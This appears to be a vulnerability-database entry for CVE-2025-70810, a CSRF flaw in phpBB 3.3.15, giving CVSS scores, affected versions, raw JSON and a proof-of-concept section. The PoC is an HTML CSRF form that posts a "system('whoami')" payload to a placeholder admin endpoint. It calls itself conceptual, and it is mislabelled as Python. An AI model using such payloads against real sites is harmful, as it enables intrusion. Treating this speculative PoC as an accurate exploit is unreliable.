Security Vulnerability Report
中文
CVE-2025-70810 CVSS 8.8 HIGH

CVE-2025-70810

Published: 2026-04-09 15:16:09
Last Modified: 2026-04-17 13:06:33

Description

Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the login function and the authentication mechanism

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:phpbb:phpbb:3.3.15:-:*:*:*:*:*:* - VULNERABLE
phpBB 3.3.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-70810: CSRF leading to RCE This is a conceptual example demonstrating how a malicious request might be crafted. The target endpoint and parameters depend on the specific vulnerable component in phpBB 3.3.15. --> <html> <body> <h1>CSRF Exploit Demo</h1> <p>Click the button to execute the command (Simulated).</p> <!-- In a real scenario, the 'action' attribute would point to the vulnerable endpoint (e.g., admin script or login processor) and the form data would contain the payload. --> <form action="http://target-phpbb-site/phpBB/adm/index.php" method="POST"> <input type="hidden" name="action" value="execute_code" /> <input type="hidden" name="payload" value="system('whoami');" /> <input type="hidden" name="csrf_token" value="" /> <!-- Token missing or bypassed --> <input type="submit" value="Click Me" /> </form> <script> // Auto-submit script to ensure interaction if required by UI:R // document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-70810", "sourceIdentifier": "[email protected]", "published": "2026-04-09T15:16:09.037", "lastModified": "2026-04-17T13:06:33.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3.3.15 allows a local attacker to execute arbitrary code via the login function and the authentication mechanism"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpbb:phpbb:3.3.15:-:*:*:*:*:*:*", "matchCriteriaId": "0F92D845-DF72-48D5-9BF6-CD8E0736A08D"}]}]}], "references": [{"url": "https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/ariefibis", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.linkedin.com/in/mohammed-a-6a2548112/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}